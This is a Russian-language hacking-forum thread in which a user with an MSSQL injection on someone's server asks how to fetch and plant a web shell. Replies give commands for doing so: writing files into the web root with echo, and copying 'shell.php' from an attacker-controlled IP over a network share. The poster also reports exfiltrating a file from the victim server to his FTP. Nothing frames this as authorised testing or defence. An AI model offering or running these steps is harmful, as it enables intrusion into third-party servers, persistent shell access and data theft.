Загрузка файла через MSSQL INJ

Discussion in 'Песочница' started by jangle, 25 Dec 2011.

  1. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    117
    Likes Received:
    5
    Reputations:
    6
    Доброго времени суток, уважаемые.
    Подскажите, есть ли возможность через CMD скачать файл с интернета и сохранить его локально. Т.е. задача такова: имея MSSQL injection и возможность воспользоваться
    вместо bla bla bla использовать команду тоторая скачала бы шелл с моего сервера и сохранила в указанное место на уязвимый сервер.

    Спасибо за ответы
     
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,248
    Likes Received:
    1,148
    Reputations:
    886
    jangle

    про закачку файлов ничего сказать не могу, но есть вариант записать данные в файл, это поможет залить хоть форму загрузки файлов

    cmd> echo "тут твой текст" > C:\папка_в_htdocs_\твойфайл

    как и в никсах..
     
    _________________________
    #2 Konqi, 25 Dec 2011
    Last edited: 25 Dec 2011
  3. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    117
    Likes Received:
    5
    Reputations:
    6
    как вариант.
    НО ...

    к сожалению при повторном выполнении команды текст переписывается, а для записи в файл формы нужно будет сделать несколько строк, т.к. SQL INJ не позволяет в моем данном случае вписать длинный текст, кроме того фильтрация некоторых символов которые используются в том же html все таки есть.

    к стати, для того что бы строки добавлялись в файл а не переписывались можно использовать
    В общем, буду экспериментировать и ОГРОМНЕШЕЕ СПАСИБО за наводочку - буду думать)
     
  4. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,582
    Likes Received:
    1,310
    Reputations:
    1,557
    copy \\123.123.123.123\my_shared_dir\filename.txt c:\site\shell.php
     
  5. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    117
    Likes Received:
    5
    Reputations:
    6
    Этот способ не подходит т.к. копировать можно с рашаренного IP по NetBIOS

    С сайта же нет возможности (если я не ошибаюсь)

    Пробую локально
    Пишет
     
  6. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    117
    Likes Received:
    5
    Reputations:
    6
    Этот способ я пробовал, но что- то не так. Не получилось

    Реализовал примерно так (может кому надо будет. Тут заливка C:\1.txt с уязвимого сервера на мой FTP)
    Вообщем, направление понятно
    Konqi, M_script, Nightmarе - БЛАГОДАРЮ!

    Тема закрыта
     
    #6 jangle, 26 Dec 2011
    Last edited: 26 Dec 2011